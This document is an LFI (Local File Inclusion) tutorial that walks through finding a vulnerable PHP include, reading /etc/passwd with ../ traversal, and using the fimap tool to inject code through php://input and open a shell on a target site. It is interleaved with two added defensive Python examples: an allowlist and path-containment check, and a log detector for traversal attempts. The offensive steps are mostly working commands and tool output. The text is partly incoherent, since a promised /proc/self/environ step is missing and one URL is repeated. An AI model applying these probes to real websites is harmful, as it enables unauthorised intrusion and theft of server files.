Local File Inclusion Example 2
LOCAL FILE INCLUSION:
Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized and allows directory traversal characters to be injected.
This step-by-step tutorial shows how to get a shell on websites using Local File Inclusion vulnerabilities and by injecting malicious code into /proc/self/environ.
First let's take a look at PHP code that is vulnerable to LFI:
<?php
// Deliberately vulnerable: the page name is taken straight from the query string
// and handed to include() without any validation.
$page = $_GET['page'];
include($page);
?>
Now, this is a piece of code that should NEVER be used, because $page isn't sanitized and is passed directly to include(), but unfortunately (or not) it is very common to find on the web.
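The two checks the snippet above is missing are shown here in Python as an added example (this is not code from the original page; the same logic ports directly to PHP with an array lookup or realpath()). The preferred fix treats ?page= as an opaque key into a fixed map; the containment check is a second line of defence for cases where a fixed map is impractical. The ALLOWED_PAGES map, the sample inputs and the temporary pages directory are constructed for the demonstration.

```python
import tempfile
from pathlib import Path

# Constructed allowlist: the only pages view.php is ever meant to include.
# The request supplies a key, never a filename or a path.
ALLOWED_PAGES = {"contact": "contact.php", "about": "about.php", "home": "index.php"}


def resolve_by_allowlist(page_param):
    """Preferred fix: map an opaque key to a fixed filename; anything else is rejected."""
    return ALLOWED_PAGES.get(page_param)


def resolve_by_containment(page_param, base_dir):
    """Defence in depth: accept a name only if its canonical path stays inside base_dir
    and points at an existing .php file. Returns the resolved path or None."""
    if not page_param or "\x00" in page_param:
        return None  # null bytes were historically used to cut off an appended suffix
    base = Path(base_dir).resolve()
    # An absolute input such as /etc/passwd replaces base here, so it fails relative_to().
    candidate = (base / page_param).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        return None  # ../ sequences escaped the pages directory
    if candidate.suffix != ".php" or not candidate.is_file():
        return None
    return str(candidate)


def evaluate(samples, base_dir):
    """Return {input: (accepted_by_allowlist, accepted_by_containment)} for each sample."""
    return {
        s: (resolve_by_allowlist(s) is not None, resolve_by_containment(s, base_dir) is not None)
        for s in samples
    }


def demo():
    """Build a throwaway pages directory and run constructed inputs through both checks."""
    samples = [
        "contact",               # valid allowlist key
        "contact.php",           # valid filename, not a key
        "../",                   # the probe from Step 2
        "../../etc/passwd",      # relative traversal
        "/etc/passwd",           # absolute path
        "/proc/self/environ",    # absolute path
        "contact.php\x00.jpg",   # null-byte truncation attempt
        "sub/../contact.php",    # traversal that still lands inside the directory
    ]
    with tempfile.TemporaryDirectory() as tmp:
        for name in ALLOWED_PAGES.values():
            (Path(tmp) / name).write_text("<?php // page stub\n")
        return evaluate(samples, tmp)


if __name__ == "__main__":
    for value, (by_key, by_path) in demo().items():
        print(f"{value!r:28} allowlist={by_key!s:5} containment={by_path}")
```

Note that "sub/../contact.php" passes the containment check because its canonical path is inside the directory; that is exactly why the allowlist is the primary fix and containment only a backstop.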
Step 2:
Now we are going to find a website vulnerable to Local File Inclusion. So we found our target; let's check it.
e.g. www.website.com/view.php?page=contact.php
- Now let's replace contact.php with ../ so the URL becomes
www.website.com/view.php?page=../
and we get an error:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
There is a big chance of a Local File Inclusion vulnerability. Let's go to the next step.
- Now let's check for /etc/passwd to see if it is vulnerable to Local File Inclusion. Let's make a request:
http://www.website.com/view.php?page=../../etc/passwd
We get an error and no /etc/passwd file:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
so we go more directories up
http://www.website.com/view.php?page=../../etc/passwd
We successfully included the /etc/passwd file.
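The probes in Step 2 leave a distinctive trail in two places a defender already has: the web server access log (the request line with ../ or an absolute path in the page parameter) and the PHP error log (the "failed to open stream" warning quoted above). The following Python is an added example, not part of the original tutorial: it parses Apache combined-format access-log lines and PHP warning lines and tags parameter values that look like traversal, sensitive-file, stream-wrapper or remote-URL inclusion attempts, after undoing percent-encoding so encoded variants are caught. All log lines, IP addresses and paths are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (Apache combined format); sample data, not from the page.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /view.php?page=contact.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:55:41 +0000] "GET /view.php?page=../ HTTP/1.1" 200 412 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:55:47 +0000] "GET /view.php?page=../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:55:52 +0000] "GET /view.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:56:03 +0000] "POST /view.php?page=php://input HTTP/1.1" 200 77 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:56:10 +0000] "GET /view.php?page=/proc/self/environ HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:57:01 +0000] "GET /view.php?page=about.php HTTP/1.1" 200 4010 "-" "Mozilla/5.0"
"""

# Constructed PHP error_log lines modelled on the warning format quoted in Step 2.
SAMPLE_ERROR_LOG = """\
[10/Oct/2023:13:55:41] PHP Warning:  include(../) [function.include]: failed to open stream: No such file or directory in /var/www/html/view.php on line 3
[10/Oct/2023:13:55:47] PHP Warning:  include(../../../etc/passwd) [function.include]: failed to open stream: No such file or directory in /var/www/html/view.php on line 3
[10/Oct/2023:13:58:00] PHP Notice:  Undefined index: page in /var/www/html/view.php on line 2
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')          # ../ or ..\ as a path component
WRAPPER_RE = re.compile(r'^(?:php|data|expect|phar|zip|glob)://', re.IGNORECASE)
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/proc/self/environ", "/proc/self/cmdline")
INCLUDE_WARN_RE = re.compile(r'include\((?P<arg>[^)]*)\).*failed to open stream')


def normalize(value):
    """Undo one extra layer of percent-encoding so double-encoded payloads also resolve."""
    return unquote(unquote(value))


def classify_value(value):
    """Return the list of indicator tags that apply to one parameter value."""
    v = normalize(value)
    tags = []
    if "\x00" in v:
        tags.append("null-byte")
    if TRAVERSAL_RE.search(v):
        tags.append("traversal")
    if any(p in v for p in SENSITIVE_PATHS):
        tags.append("sensitive-path")
    if WRAPPER_RE.match(v):
        tags.append("stream-wrapper")
    if REMOTE_RE.match(v):
        tags.append("remote-url")
    return tags


def detect_lfi(log_text):
    """Scan access-log lines; return one finding per suspicious query parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            tags = classify_value(raw)
            if tags:
                findings.append({"ip": m.group("ip"), "status": int(m.group("status")),
                                 "param": name, "value": normalize(raw), "tags": tags})
    return findings


def detect_include_warnings(error_log):
    """Return the include() arguments from PHP warnings that carry an LFI indicator."""
    hits = []
    for line in error_log.splitlines():
        m = INCLUDE_WARN_RE.search(line)
        if m and classify_value(m.group("arg")):
            hits.append(m.group("arg"))
    return hits


if __name__ == "__main__":
    for f in detect_lfi(SAMPLE_LOG):
        print(f"{f['ip']} {f['param']}={f['value']!r} status={f['status']} {','.join(f['tags'])}")
    print("include() warnings:", detect_include_warnings(SAMPLE_ERROR_LOG))
```

In practice the two sources complement each other: a traversal request that produced a PHP warning most likely failed, while the same request returning 200 with a response size that differs from the site's normal pages (1843 bytes for /etc/passwd in the constructed data) is the one to escalate.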
Step 3:
Let's try something different.
Download fimap from http://code.google.com/p/fimap/
Now make sure that you have Python installed (Python version 2.6.4).
Now let's start the LFI.
Step 4:
Scan using fimap from the command prompt; make sure that you are in the fimap directory.
For URL scanning we use -u:
desktop\fi> fimap.py -u "target URL"
If fimap has found an Inclusion-Bug, you will see a box like this:
###################################################################################
#[1] Possible File Injection #
###################################################################################
# [URL] http://localhost/vulnerable.php?inc=index #
# [PARAM] inc #
# [PATH] /var/www #
# [TYPE] Absolute Clean + Remote injection #
# [NULLBYTE] No Need. It's clean. #
# [READABLE FILES] #
# [0] /etc/passwd #
# [1] php://input #
# [2] http://www.phpbb.de/index.php #
# [3] http://www.uni-bonn.de/Frauengeschichte/index.html #
# [4] http://www.kah-bonn.de/index.htm?presse/winterthur.htm #
###################################################################################
You can see that we actually have readable files. Some of them are usable to inject code, some are not.
fimap will automatically log every valuable result to '~/fimap_results.xml'. The XML will never be deleted;
all new results will be merged correctly into the XML.
Now we have to exploit using -x:
desktop\fi> fimap.py -x "target URL"
FULL EXAMPLE RUN
[CMD]imax@DevelB0x:~$ ./fimap.py -u "http://localhost/vulnerable.php?inc=index.php"
fimap v.01 by Iman Karim - Automatic LFI/RFI scanner and exploiter.
SingleScan is testing URL: 'http://localhost/vulnerable.php?inc=index.php'
[OUT] Parsing URL 'http://localhost/vulnerable.php?inc=index.php'...
[INFO] Fiddling around with URL...
[OUT] Possible file inclusion found! -> 'http://localhost/vulnerable.php?inc=bUTeWg6j' with Parameter 'inc'.
[OUT] Identifing Vulnerability 'http://localhost/vulnerable.php?inc=index.php' with Key 'inc'...
[INFO] Scriptpath received: '/var/www'
[INFO] Testing file '/etc/passwd'...
[INFO] Testing file '/proc/self/environ'...
[INFO] Testing file 'php://input'...
[INFO] Testing file 'http://www.phpbb.de/index.php'...
[INFO] Testing file 'http://www.uni-bonn.de/Frauengeschichte/index.html'...
[INFO] Testing file 'http://www.kah-bonn.de/index.htm?presse/winterthur.htm'...
###################################################################################
#[1] Possible File Injection #
###################################################################################
# [URL] http://localhost/vulnerable.php?inc=index.php #
# [PARAM] inc #
# [PATH] /var/www #
# [TYPE] Absolute Clean + Remote injection #
# [NULLBYTE] No Need. It's clean. #
# [READABLE FILES] #
# [0] /etc/passwd #
# [1] php://input #
# [2] http://www.phpbb.de/index.php #
# [3] http://www.uni-bonn.de/Frauengeschichte/index.html #
# [4] http://www.kah-bonn.de/index.htm?presse/winterthur.htm #
###################################################################################
[CMD]imax@DevelB0x:~$ ./fimap.py -x
fimap v.01 by Iman Karim - Automatic LFI/RFI scanner and exploiter.
###################
#List of Domains #
###################
#[1] localhost #
###################
Choose Domain: 1
###############################################################################################
#FI Bugs on localhost #
###############################################################################################
#[1] URL: '/vulnerable.php?inc=index.php' injecting file: 'php://input' using param: 'inc' #
###############################################################################################
Choose vulnerable script: 1
[INFO] Testing code injection thru POST...
[OUT] PHP Injection works! Testing if execution works...
[OUT] Testing execution thru 'popen'...
#################################
#Available Attacks #
#################################
#[1] Spawn Shell #
#[2] Create reverse shell... #
#################################
Choose Attack: 1
-------------------------------------------
Welcome to fimap shell!
Better don't start interactive commands! ;)
Enter 'q' to exit the shell.
-------------------------------------------
fimap_shell$> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
fimap_shell$> uname -a
Linux DevelB0x 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
fimap_shell$> q
Now just type the exact URL, i.e. the path of the shell.